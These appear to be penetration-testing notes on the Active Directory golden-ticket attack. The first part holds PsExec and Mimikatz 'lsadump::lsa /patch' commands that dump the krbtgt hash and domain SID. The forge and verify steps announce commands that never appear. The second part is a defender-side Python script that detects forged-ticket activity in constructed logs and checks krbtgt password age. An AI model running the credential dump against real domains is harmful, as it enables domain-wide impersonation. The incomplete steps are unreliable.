Golden Ticket

If we can get our hands on the krbtgt account's password hash, we can forge our own TGTs, known as golden tickets.

A golden ticket grants access to resources across the entire domain.

Silver tickets, by contrast, forge a TGS (service ticket) to access one specific service.

The biggest advantage is that the krbtgt account password is not changed automatically.

Step 1: Attempt to Access the Domain Controller (DC)

# Make sure PsExec (from the Sysinternals PsTools suite) has been uploaded to the victim machine.
# Test whether the current account can already open a shell on the DC:
.\PsExec64.exe \\DC1 cmd.exe
# If this fails, the current account has no access to the DC yet.

Step 2: Extract the krbtgt Hash Using Mimikatz

If that fails, the current account does not have permission to access the DC. To gain access, we first extract the krbtgt hash using Mimikatz.

Remember that running Mimikatz requires administrative privileges. 🔐👨‍💻 ☺️

Using a higher-privileged account, we extract the NTLM hash of the krbtgt account along with the domain SID; both are needed to forge and inject a golden ticket.

# Make sure mimikatz has been uploaded :)
.\mimikatz.exe "privilege::debug" "log" "lsadump::lsa /patch" "exit"
# Make a note of the krbtgt NTLM hash and the domain SID.
# Example:
# Domain SID: S-1-5-21-1987370270-658905905-1781884369 (see the top of the output)
# krbtgt hash: 1693c6cefafffc7af11ef34d1c788f47

The lsadump module in Mimikatz extracts sensitive information from the Local Security Authority (LSA) subsystem on Windows systems.

/patch: patches the LSA process in memory so that the stored account hashes can be read.

Step 3: Forge and Inject the Golden Ticket

Switch to the account in whose context you want to create the golden ticket.

Clear any existing tickets first: any cached Kerberos tickets can be removed with kerberos::purge in Mimikatz.

Now we create the golden ticket and then launch cmd with it.

Step 4: Verify Access to the Domain Controller

We attempt to access the DC again. Run the command below in the new terminal launched by the previous step:

Verify the group membership.
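The defender-side counterpart to the steps above, added here as an example and not part of the original notes. It covers two checks: the point made earlier that the krbtgt password is never rotated automatically (compute its age from the directory's pwdLastSet FILETIME value) and the access test in Step 4 (a service ticket request, event 4769, from a client that never asked the KDC for a TGT, event 4768, or for an account that does not exist in the directory, is what a forged TGT looks like in the Security log). All events, account names and the FILETIME values are constructed for the example; the function names are my own.

```python
"""Defender-side checks for the golden-ticket scenario (constructed data only)."""
from datetime import datetime, timedelta, timezone

# Default maximum TGT lifetime in Active Directory is 10 hours; a legitimate
# service-ticket request (4769) should normally be preceded by a TGT request
# (4768) for the same account from the same client within that window.
MAX_TGT_LIFETIME_SECONDS = 10 * 60 * 60

# Constructed sample events: a subset of the fields carried by Security
# events 4768 (Kerberos TGT requested) and 4769 (service ticket requested).
# "ts" is seconds since an arbitrary epoch chosen for this sample.
SAMPLE_EVENTS = [
    {"id": 4768, "account": "alice", "ip": "10.0.0.5", "ts": 100},
    {"id": 4769, "account": "alice", "ip": "10.0.0.5", "service": "cifs/DC1", "ts": 101},
    # A service ticket for "admin" from a host that never requested a TGT from
    # the KDC: consistent with a TGT forged offline and injected into the session.
    {"id": 4769, "account": "admin", "ip": "10.0.0.9", "service": "cifs/DC1", "ts": 205},
    # A service ticket for an account name that does not exist in the directory.
    {"id": 4769, "account": "ghostuser", "ip": "10.0.0.9", "service": "ldap/DC1", "ts": 206},
]

# Constructed list of accounts that exist in the directory.
KNOWN_ACCOUNTS = {"alice", "bob", "admin", "krbtgt"}


def hunt_forged_tgt(events, known_accounts, window=MAX_TGT_LIFETIME_SECONDS):
    """Return one finding per suspicious 4769 event, in timestamp order."""
    known = {a.lower() for a in known_accounts}
    findings = []
    last_tgt = {}  # (account, client ip) -> timestamp of the most recent 4768
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["account"].lower(), ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = ev["ts"]
        elif ev["id"] == 4769:
            reasons = []
            issued = last_tgt.get(key)
            if issued is None or ev["ts"] - issued > window:
                reasons.append("tgs_without_recent_tgt")
            if key[0] not in known:
                reasons.append("unknown_account")
            for reason in reasons:
                findings.append({"account": ev["account"], "ip": ev["ip"],
                                 "service": ev.get("service"), "reason": reason})
    return findings


def filetime_to_datetime(filetime):
    """Convert a Windows FILETIME (100-ns ticks since 1601-01-01 UTC) to a datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def krbtgt_password_age_days(pwd_last_set_filetime, now=None):
    """Age in days of the krbtgt password, from the account's pwdLastSet attribute."""
    now = now or datetime.now(timezone.utc)
    return (now - filetime_to_datetime(pwd_last_set_filetime)).days


if __name__ == "__main__":
    for finding in hunt_forged_tgt(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(finding)
    # Constructed pwdLastSet value corresponding to 2020-01-01 00:00:00 UTC.
    sample_pwd_last_set = 132223104000000000
    print("krbtgt password age (days):", krbtgt_password_age_days(sample_pwd_last_set))
```

The 4769-without-4768 heuristic needs the caveat that the TGT may have been issued by a different domain controller or before the start of the log window, so events from all DCs should be correlated and the finding treated as a lead rather than proof. A krbtgt password age far beyond the organisation's rotation policy is the condition that keeps forged tickets usable; the remedy is a scheduled rotation of the krbtgt password (twice, with a replication interval between the changes, so both the current and previous key are replaced).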
